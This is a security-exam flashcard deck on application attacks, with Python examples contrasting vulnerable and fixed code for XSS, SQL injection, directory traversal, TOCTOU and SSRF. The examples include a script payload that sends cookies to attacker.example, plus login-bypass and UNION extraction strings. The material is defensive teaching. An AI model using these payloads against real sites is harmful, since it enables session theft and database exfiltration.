1.3 Application Attacks Flashcards

1
Q

Define Privilege Escalation

A

Using an existing account to gain privileges beyond those granted to that account

2
Q

Examples of privilege escalation attacks (2)

A
  1. User A gaining access to resources that are only granted to User B (horizontal escalation)
  2. Using a regular user account to launch an attack that gains Administrator/Root access (vertical escalation)
3
Q

Preventing Privilege Escalation attacks (3)

A
  1. Data Execution Prevention (DEP)
  2. Anti-virus/anti-malware software
  3. Keeping OS patches up-to-date
4
Q

Cross Site Scripting attack (XSS)

A

Taking advantage of web browsers' and web-based applications' use of JavaScript to run attacker-supplied script in a victim's browser

5
Q

2 Types of Cross Site Scripting attacks

A
  1. Non-Persistent, also called Reflected: the script is carried in the request and echoed back in the server's response
  2. Persistent, also called Stored: the script is saved on the server and served to every visitor
6
Q

Define Non-Persistent Cross Site Scripting Attack

A

Sends the victim a link to a valid but vulnerable web site with malicious JavaScript appended to a URL parameter or input field; the site reflects the script back in its response, and it runs silently in the victim's browser when the link is clicked

7
Q

Define Persistent Cross Site Scripting Attack

A

Permanently posting malicious JavaScript to a site that stores and displays user content, e.g. a message board or forum site; the script runs in every visitor's browser each time the page is loaded

8
Q

Difference between Persistent and Non-Persistent Cross Site Scripting Attack

A

Non-persistent is delivered to each victim individually (a crafted link) and reflected back by the server into that one response; Persistent is stored on the web server and runs every time someone accesses the web page
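The reflected and stored cases side by side, as an added example that is not part of the original deck. The page-rendering functions, the `CommentBoard` class and the sample payload are constructed for illustration; the fix in both cases is the same, HTML-encoding untrusted text before it is placed in the page:

```python
import html

# Constructed sample inputs: a benign comment and an XSS payload that exfiltrates cookies.
BENIGN = "Great article!"
PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def render_search_vulnerable(query):
    """Reflected XSS: the query parameter is echoed into the page unescaped,
    so a crafted link carrying PAYLOAD runs script in whoever clicks it."""
    return f"<h1>Results for: {query}</h1>"


def render_search_safe(query):
    """Same page with output encoding: < > & \" ' become HTML entities."""
    return f"<h1>Results for: {html.escape(query)}</h1>"


class CommentBoard:
    """Minimal stored-content site: comments are saved once and re-rendered
    for every visitor, which is what makes stored XSS persistent."""

    def __init__(self):
        self.comments = []

    def post(self, text):
        self.comments.append(text)

    def render_vulnerable(self):
        return "".join(f"<p>{c}</p>" for c in self.comments)

    def render_safe(self):
        return "".join(f"<p>{html.escape(c)}</p>" for c in self.comments)


def contains_script(page):
    """True if the rendered page still carries a live <script> tag."""
    return "<script>" in page
```

`html.escape` is only correct for text placed between tags or in quoted attribute values; script blocks, URLs and CSS need their own encoders, and a Content Security Policy limits the damage when an encoding is missed.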

9
Q

Define Injection Attack

A

Inserting attacker-controlled data into a data stream or query so that the application interprets it as commands rather than data, for malicious intent

10
Q

4 Common Injection Attacks

A
  1. SQL Injection
  2. XML Injection
  3. DLL Injection
  4. LDAP Injection
11
Q

Define SQL Injection

A

Capitalizing on poorly designed web sites that build SQL statements from unvalidated user input, to extract or modify data in the database via modified SQL statements
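An added example, not from the original deck, showing both outcomes the card names: a login bypass and data extraction. The in-memory SQLite table, its rows and the two payload strings are constructed for illustration; the vulnerable function concatenates input into the statement, the safe one passes it as a bound parameter:

```python
import sqlite3


def make_db():
    """Constructed in-memory users table (example data, not from any real system)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "s3cret-admin", "admin"), ("alice", "alice-pw", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string formatting, so input is parsed as SQL."""
    sql = (
        f"SELECT role FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the SQL text and
    can never change the statement's structure."""
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Constructed payloads.
# Closes the string literal and comments out the password check: logs in as admin.
BYPASS_INJECTION = "admin'--"
# Replaces the selected column with another one: the "role" returned is the admin password.
UNION_INJECTION = "x' UNION SELECT password FROM users WHERE username='admin'--"
```

Input validation (allow-listing characters) is a second layer, not a substitute: the parameterised query is what removes the vulnerability, and it costs nothing to apply everywhere.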

12
Q

Define XML Injection

A

Appending malformed or attacker-crafted XML to XML exchanged between devices, so that the receiver parses elements the sender never intended, for malicious intent

13
Q

Define LDAP Injection

A

Injecting LDAP filter syntax into data sent to an LDAP directory so that the modified query reads or changes information in the LDAP database

14
Q

Define DLL Injection

A

Forcing a running, legitimate process to load a malicious DLL so that the DLL's code executes inside that process, with that process's privileges, whenever it runs

15
Q

Define Pointer/Object Dereference, how and result

A
  1. Supply a pointer to a memory location that the program is not expecting
  2. The attack might allow modification of critical state variables, cause a crash, or lead to execution of attacker-supplied code
16
Q

Define Directory Traversal attack and specific server type vulnerable to it

A

Accessing files and directories on a web server outside of the publicly available directory (the web root) hosting the web content, typically by placing ../ sequences (often URL-encoded) in a requested path
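An added example, not from the original deck, of the check a web server needs before mapping a requested path onto disk. The document root and the request strings are constructed; the function decodes the path, normalises away `.` and `..`, and accepts the result only if it is still inside the root:

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root for the example


def resolve_web_path(root, requested):
    """Map a requested URL path onto the filesystem, refusing anything that
    escapes the web root. Returns the absolute path, or None if rejected."""
    decoded = unquote(requested)  # %2e%2e%2f -> ../ ; servers decode before routing
    # Treat the request as relative to the root; normpath collapses . and .. segments.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Compare against root + "/" so that a sibling like /var/www/html2 is not accepted.
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def classify(root, requests):
    """Run a batch of constructed requests and report which are served."""
    return {r: resolve_web_path(root, r) for r in requests}
```

Two caveats a practitioner will hit: on a real filesystem resolve with `os.path.realpath` as well, so a symlink inside the root cannot point outside it, and on Windows servers treat `\` as a separator too, since `posixpath` leaves `..\..\` as an ordinary file name.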

17
Q

Define Buffer Overflow attack

A

Writing more data into a buffer than it was sized to hold, so the excess overwrites adjacent memory; this can crash the application or, if the overwritten memory holds a return address or pointer, allow execution of attacker-supplied code

18
Q

What causes buffer overflow vulnerabilities?

A

Poor application programming: copying input into a fixed-size buffer without first checking that it fits (no bounds checking)

19
Q

Define Race Condition attack

A

Taking advantage of the timing between simultaneously running processes or threads that share a resource, for malicious intent

20
Q

What is a TOCTOU attack?

A

Time-Of-Check to Time-Of-Use attack: a race condition in which a value is checked (e.g. an account balance) and used later, and the attacker changes it in between, i.e. transferring more money from an account than the available balance by starting several transfers before any of them completes
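The balance example carried through in code, as an added example that is not part of the original deck. The `Account` class and the two withdrawal routines are constructed; the racy version checks the balance and debits it as two separate steps, and a `Barrier` is used to force both threads through the check before either debits, which makes the otherwise non-deterministic interleaving reproducible:

```python
import threading


class Account:
    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()


def withdraw_racy(account, amount, gate):
    """Time of check and time of use are separate steps with no lock spanning them."""
    if account.balance >= amount:  # time of check: reads a balance that may go stale
        gate.wait()  # constructed: hold here until both threads have passed the check
        with account.lock:  # the debit itself is atomic, but it trusts the stale check
            account.balance -= amount
        return True
    return False


def withdraw_atomic(account, amount):
    """Check and use under one lock: no window for another thread to slip in."""
    with account.lock:
        if account.balance >= amount:
            account.balance -= amount
            return True
        return False


def run_concurrent(balance, amount, racy):
    """Start two withdrawals of `amount` against one account and return the final balance."""
    account = Account(balance)
    gate = threading.Barrier(2)
    if racy:
        threads = [threading.Thread(target=withdraw_racy, args=(account, amount, gate))
                   for _ in range(2)]
    else:
        threads = [threading.Thread(target=withdraw_atomic, args=(account, amount))
                   for _ in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return account.balance
```

With a balance of 100 and two withdrawals of 80, the racy version lets both through and ends at -60; the atomic version serves one and refuses the other, ending at 20. The same pattern applies to filesystem TOCTOU (`access()` then `open()`): the fix is always to make the check and the use a single operation, not to shrink the window.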

21
Q

What vulnerability exists related to application error handling?

A

Improper error messages might expose valuable system information, such as a stack trace, database schema or file path, that can be used for further malicious activities

22
Q

Vulnerability exposed by improper input handling?

A

Improperly validating, or not validating, data input by users opens the application up to injection attacks

23
Q

Define replay attack

A

Capturing information, such as Session IDs, from network traffic and then re-sending it to create malicious requests that the server accepts as genuine

24
Q

Define Session Replay attack

A

The attacker poses as an authorized user by obtaining a valid session ID from the network and presenting it as their own, so the server treats the attacker as that user or system

25
Q

Preventing Replay attacks (2)

A
  1. Encrypt all communications, so session IDs and credentials cannot be captured in the first place
  2. Salting hashes: include a per-session salt, nonce or timestamp in the authentication exchange, so a captured value is only valid once
26
Q

Define Integer overflow

A

Occurs when an arithmetic result is larger than the integer type can hold, so the value wraps around to an unexpected (small or negative) number; if that number is then used as a buffer size or index, it can cause a buffer overflow or crash the application

27
Q

Define Cross-Site Request Forgery

A

Tricking a victim's browser into sending unwanted requests to a web application where the victim is already authenticated, so the application performs actions on the attacker's behalf using the victim's session

28
Q

What is the abbreviation for Cross-Site Request Forgery? (2)

A

XSRF or CSRF

29
Q

How is a Cross-Site Request Forgery attack initiated?

A

It depends on the victim's browser sending the forged request while logged in, typically because the victim clicks a malicious URL or visits a page that submits the request automatically

30
Q

Define Server-Side Request Forgery

A

A forged request initiated from the server to access services that are not publicly exposed

31
Q

How is a Server-Side Request Forgery attack initiated?

A

Malicious requests are sent to a vulnerable web application that fetches URLs on the user's behalf; the server then reaches private services (internal hosts, localhost, cloud metadata endpoints) that the attacker cannot reach directly, to perform malicious actions
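An added example, not from the original deck, of the destination check a URL-fetching feature needs before it connects. The hostname-to-address table stands in for DNS so the code runs offline and is constructed (the public address is an arbitrary globally routable one); the check accepts only http(s) URLs whose host, literal or resolved, is a public address:

```python
import ipaddress
from urllib.parse import urlparse

# Constructed resolver standing in for DNS (example data only).
FAKE_DNS = {
    "api.partner.example": "8.8.8.8",        # any public address would do here
    "localhost": "127.0.0.1",
    "intranet.corp.example": "10.0.0.5",
    "metadata.example": "169.254.169.254",   # link-local, the cloud metadata range
}


def resolve_target(url, resolver=FAKE_DNS):
    """Return the IP address the URL would connect to, or None if it cannot be determined."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return None
    host = parsed.hostname
    try:
        return ipaddress.ip_address(host)   # literal IPv4/IPv6 in the URL
    except ValueError:
        addr = resolver.get(host)
        return ipaddress.ip_address(addr) if addr else None


def is_allowed_fetch_target(url, resolver=FAKE_DNS):
    """Allow only destinations that are globally routable: loopback, private (RFC 1918),
    link-local and reserved ranges are all refused."""
    ip = resolve_target(url, resolver)
    return ip is not None and ip.is_global


def fetch_on_behalf(url, resolver=FAKE_DNS):
    """Constructed stand-in for the server-side fetch: returns what the server would
    do, without making a network connection."""
    if not is_allowed_fetch_target(url, resolver):
        return "refused"
    return f"fetch {resolve_target(url, resolver)}"
```

Two things the check alone does not cover: the fetch must connect to the address that was checked (resolve once, then connect to that IP), or a DNS rebinding trick can change the answer between check and use; and HTTP redirects must be disabled or re-checked, since a public host can redirect the server to an internal one.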

32
Q

Define application programming interface (API) attack

A

Sending malicious HTTP requests (GET, POST or any other method) to an API service to cause a system crash, obtain information, or perform other malicious actions

33
Q

Define Resource Exhaustion attack

A

A type of denial-of-service attack often launched from a single low-bandwidth device to crash a device or service by consuming all of its resources

34
Q

What are 2 examples of Resource Exhaustion attacks?

A
  1. Sending a small zip file that is huge when decompressed
  2. DHCP starvation - creating a bunch of DHCP requests to consume all of the addresses available in the pool
35
Q

Define Memory Leak in an application

A

A vulnerability where memory is not released after use and eventually the application consumes all available memory on the device

36
Q

Define Null Pointer Dereference vulnerability in an application

A

A vulnerability where the application uses (dereferences) a pointer that is NULL, e.g. after a failed allocation or lookup whose result was never checked, causing the application to crash if not properly handled

37
Q

Define SSL Stripping attack

A

A man-in-the-middle attack that intercepts HTTP(S) communications. The client browser is tricked into staying on plain HTTP instead of being upgraded to HTTPS: the attacker relays HTTP to the client and HTTPS to the server. The malicious middle host can now read and modify everything communicated.

38
Q

How to avoid SSL Stripping attack

A

Configure web servers to serve HTTPS only and to send the HTTP Strict Transport Security (HSTS) header, so that client browsers refuse to connect over plain HTTP

39
Q

Define Driver Manipulation attack

A

Exploiting vulnerabilities in drivers to bypass anti-virus/malware scanning for malicious intent

40
Q

Define Driver Manipulation - Shimming attack

A

A shim is a small library that translates API calls to create compatibility between an app and the OS. Because the shim sits between the application and the OS, it creates an opportunity for malicious manipulation of those calls.

41
Q

Define Driver Manipulation - Refactoring attack

A

Refactoring virus/malware code to evade signature detection by anti-virus/malware programs

42
Q

Define Pass-the-Hash attack

A

If an attacker can capture a user's password hash (e.g. an NTLM hash), they can present the hash itself, without cracking it, in a replay-style authentication to impersonate that user or system